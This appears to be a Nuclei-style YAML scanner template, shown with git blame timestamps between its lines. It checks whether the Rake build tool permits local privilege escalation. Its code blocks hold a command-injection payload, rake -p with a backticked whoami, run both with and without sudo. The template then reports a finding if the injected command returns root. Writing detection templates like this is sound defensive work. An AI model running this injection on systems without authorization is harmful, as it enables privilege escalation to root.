2024-01-22 18:59:57 +05:30
id : privesc-rake
2023-12-13 22:07:24 +07:00
info :
name : Rake - Privilege Escalation
author : daffainfo
severity : high
2024-01-22 18:59:57 +05:30
description : |
Rake is a build automation tool written in Ruby. It is similar to Make, Ant, or MSBuild, but uses a Ruby syntax. Rake is often used for automating tasks in software development, such as building, testing, and deploying applications.
reference :
- https://gtfobins.github.io/gtfobins/rake/
2023-12-13 22:07:24 +07:00
metadata :
verified : true
2024-01-29 11:58:34 +00:00
max-request : 3
2024-01-31 23:11:31 +05:30
tags : code,linux,rake,privesc,local
2023-12-13 22:07:24 +07:00
self-contained : true
code :
- engine :
- sh
- bash
source : |
2024-01-22 18:59:57 +05:30
whoami
2023-12-13 22:07:24 +07:00
- engine :
- sh
- bash
source : |
2024-01-22 18:59:57 +05:30
rake -p '`whoami 1>&0`'
2023-12-13 22:07:24 +07:00
- engine :
- sh
- bash
source : |
2024-01-22 18:59:57 +05:30
sudo rake -p '`whoami 1>&0`'
2023-12-13 22:07:24 +07:00
matchers-condition : and
matchers :
2024-01-22 18:59:57 +05:30
- type : word
part : code_1_response
words :
- "root"
negative : true
2023-12-13 22:07:24 +07:00
- type : dsl
dsl :
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
2024-01-22 16:20:01 +00:00
condition : or
2024-01-31 17:43:39 +00:00
# digest: 4a0a00473045022100bcc90916fbc2d8890295da859b0fecac95786566b6f62f7fbc80af89a234f691022035104e4e99936ec941983b0706403cad8de163e482d76b90a7c093889da4e618:922c64590222798bb761d5b6d8e72950